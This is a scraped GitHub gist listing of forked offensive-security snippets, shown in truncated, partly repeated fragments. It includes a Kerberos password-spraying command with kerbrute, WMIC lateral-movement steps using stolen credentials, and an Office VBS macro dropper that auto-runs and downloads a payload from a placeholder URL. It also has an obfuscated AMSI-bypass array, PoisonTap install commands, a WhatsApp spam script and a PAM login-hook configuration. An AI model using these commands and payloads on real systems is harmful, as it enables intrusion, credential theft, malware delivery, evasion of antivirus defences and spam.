With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Bart Black reanimat0r
reanimat0r
/ kerberos_attacks_cheatsheet.md
Created
April 8, 2020 21:24
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
reanimat0r
/ kerberos_attacks_cheatsheet.md
Created
April 8, 2020 21:24
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
reanimat0r
/ wmicLateralMovement.txt
Created
April 8, 2020 21:12
— forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
reanimat0r
/ blockdlls_gadget2jscript.cs
Created
April 8, 2020 21:08
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
reanimat0r
/ whatsapp_sendMSG.js
Created
April 1, 2020 03:05
— forked from yask123/whatsapp_sendMSG.js
Send messages on whatsapp by Javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.getElementsByClassName("input")[1].innerHTML="This message was written via JS script! "; // Fills the text box message | |
| var input = document.getElementsByClassName("icon btn-icon icon-send");//Grabs the send button | |
| input[0].click();// Clicks the send button |
reanimat0r
/ whatsapp_sendMSG.js
Created
April 1, 2020 02:59
— forked from igormuba/whatsapp_sendMSG.js
Spam messages to WhatsApp counting from 0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Are you new to Javascript? | |
| //Just copy, open firefox (did not work on Google Chrome for me) | |
| //press f12, go console tab, paste, change according to instructions and press enter | |
| //Thank you rafaelxavierborges for providing the message sending code | |
| //I have just turned it into a spammer that counts from 0 and send the next number every second | |
| var t=0; //what is the first number you want to send | |
| var i=1; //delay in seconds | |
| setInterval(function(){ | |
| window.InputEvent = window.Event || window.InputEvent; | |
| var d = new Date(); |
reanimat0r
/ VBS macro dropper
Created
January 30, 2020 19:17
— forked from y0no/VBS macro dropper
A simple dropper used with Office macro
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Auto_Open | |
| End Sub | |
| Sub Auto_Open() | |
| payloadURL = "<Download URL>" | |
| Dim req: Set req = CreateObject("Microsoft.XMLHTTP") | |
| Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream") | |
| req.Open "GET", payloadURL, False | |
| req.Send |
reanimat0r
/ Pi.txt
Created
January 30, 2020 19:15
— forked from jgamblin/Pi.txt
PoisonTap Install Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Server: | |
| sudo apt-get update && apt-get upgrade | |
| sudo apt-get install screen nodejs nodejs-legacy git npm | |
| sudo npm install websocket | |
| git clone https://github.com/samyk/poisontap | |
| screen | |
| sudo node backend_server.js | |
| ##piZero: | |
| sudo apt-get update && apt-get upgrade |
reanimat0r
/ amsi-bypass.ps1
Created
January 30, 2020 19:14
— forked from jkamdjou/amsi-bypass.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67, |
reanimat0r
/ pamcam
Created
December 4, 2019 03:08
— forked from misterch0c/pamcam
Take a screenshot when someone enters a wrong password
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/etc/pam.d/system-auth | |
| #%PAM-1.0 | |
| # Jump two rules if login succeeds. | |
| auth [success=2 default=ignore] pam_unix.so nullok_secure | |
| auth optional pam_exec.so /home/pamcam.sh | |
| auth requisite pam_deny.so | |
| # User gets here if authentication is successful. No denying, no cam module. | |
| auth required pam_unix.so try_first_pass nullok |